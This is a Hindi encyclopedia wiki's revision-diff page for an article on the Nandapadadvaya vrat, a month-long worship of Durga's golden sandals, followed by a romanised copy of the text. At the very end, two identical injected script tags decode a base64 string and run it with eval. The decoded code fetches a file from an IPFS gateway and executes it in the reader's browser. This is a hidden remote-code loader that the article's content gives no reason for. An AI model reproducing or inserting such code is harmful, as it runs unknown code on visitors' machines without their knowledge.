Difference between revisions of "नन्दापदद्वय व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*आम्रदलों, दूर्वा, बिल्वदलों से दुर्गा की स्वर्ण पादुकाओं की पूजा एक मास तक की जाती है।
 
*आम्रदलों, दूर्वा, बिल्वदलों से दुर्गा की स्वर्ण पादुकाओं की पूजा एक मास तक की जाती है।
 
*दुर्गाभक्त या कुमारियों को पादुकाओं का दान दिया जाता है।
 
*दुर्गाभक्त या कुमारियों को पादुकाओं का दान दिया जाता है।
 
*इस व्रत को करने से सभी पापों से मुक्ति मिल जाती है।<ref>कृत्यकल्पतरु (व्रत0, 429); हेमाद्रि (व्रत0 2, 885-886, [[पद्म पुराण]] से अलंकरण)।</ref>
 
*इस व्रत को करने से सभी पापों से मुक्ति मिल जाती है।<ref>कृत्यकल्पतरु (व्रत0, 429); हेमाद्रि (व्रत0 2, 885-886, [[पद्म पुराण]] से अलंकरण)।</ref>
 
 
 
 
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 09:41, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • amradaloan, doorva, bilvadaloan se durga ki svarn padukaoan ki pooja ek mas tak ki jati hai.
  • durgabhakt ya kumariyoan ko padukaoan ka dan diya jata hai.
  • is vrat ko karane se sabhi papoan se mukti mil jati hai.[1]

 

tika tippani aur sandarbh

  1. krityakalpataru (vrat0, 429); hemadri (vrat0 2, 885-886, padm puran se alankaran).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>